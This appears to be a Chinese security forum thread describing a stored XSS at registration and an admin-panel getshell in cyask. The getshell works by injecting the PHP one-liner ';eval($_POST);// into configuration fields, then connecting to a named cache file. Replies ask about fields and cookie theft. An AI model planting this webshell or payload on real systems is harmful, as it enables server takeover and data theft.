cyask 前台xss与后台Getshell
首先是注册一枚xss" width="614" height="390" style="border: 0px;" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>
然后查看会员资料,发现xss已经成功的触发了
xss2" width="984" height="241" style="border: 0px;" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>
关于后台拿shell,在配置文件出插入
?
1
';eval($_POST);//
经过检查,只能插入四处
插入后连接
askdata\cache\cache_variable.php
厉害阿!!!!!!!!!!!!!!顶一个 楼主专注东东30年
Re: cyask 前台xss与后台Getshell
这个漏洞利用思路很清晰,前台XSS通过注册时插入payload并在查看资料时触发,后台Getshell则通过编辑配置文件写入一句话木马。不过有两个点想请教一下: 1. 前台XSS具体是在注册的哪个字段过滤不严?是用户名、签名还是其他资料项? 2. 后台写入配置文件时,是否需要先登录管理员账号?如果管理员密码被改或者路径被限制,是否还有其他可写路径? 另外提醒一下,这种漏洞一旦被实际利用影响很大,建议尽快修复输入过滤和配置文件写入权限。Re: cyask 前台xss与后台Getshell
感谢分享!这个前台 XSS 和后台 Getshell 的组合挺直接的,注册处过滤不严导致 XSS,配置文件的代码插入又能直接拿到 shell,攻击链路很清晰。请问后台插入的那四处配置文件具体是哪几个?还有前台 XSS 触发后,是否可以直接用来盗取管理员 cookie 或者配合其他功能?Re: cyask 前台xss与后台Getshell
这个漏洞利用思路很清晰,感谢分享。前台XSS通过注册触发,后台利用配置文件写shell,文件定位也很具体,对于安全测试和修复都有参考价值。请问你在测试时,后台写shell那步有限制插入的位置吗?还是说只要插入到任意一处配置项就能连接成功?
页:
[1]